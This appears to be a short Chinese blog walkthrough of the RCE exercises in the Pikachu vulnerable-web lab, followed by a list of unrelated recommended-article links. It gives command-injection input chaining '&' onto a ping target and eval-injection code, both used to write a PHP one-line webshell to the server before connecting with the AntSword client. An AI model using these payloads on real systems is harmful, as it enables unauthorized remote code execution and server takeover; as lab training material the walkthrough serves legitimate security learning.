Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
小冯不疯1 分钟前
轻松云数据集成平台:高效系统对接与智能运维
大数据·运维
炜宏资料库12 分钟前
智慧能源设备运维管理系统如何建设?
运维·能源
古城小栈23 分钟前
Docker 下配置 Pgsql 主从复制详细步骤指南
运维·docker·容器
xixixi7777726 分钟前
从Mythos到GPT-5.4-Cyber:AI安全竞赛的“双轨”分化与防御新范式
网络·gpt·安全·机器学习·架构·大模型·claude
chao_66666635 分钟前
AI coding 代码开发规范
linux·运维·服务器
APIshop1 小时前
Python 爬虫获取京东商品详情 API 接口实战指南
java·服务器·数据库
xiaobangsky1 小时前
Linux SMB/CIFS 网络挂载配置指南
linux·运维·网络
杰 .1 小时前
闲暇时刻对LinuxOS的部分理解(一)
linux·服务器
Cyber4K1 小时前
【Nginx专项】高级进阶架构篇-Location、Rewrite及HTTPS
服务器·nginx·架构·https
俺不要写代码1 小时前
线程启动、结束,创建线程多法、join,detach,线程的移动语义
服务器·开发语言·网络·c++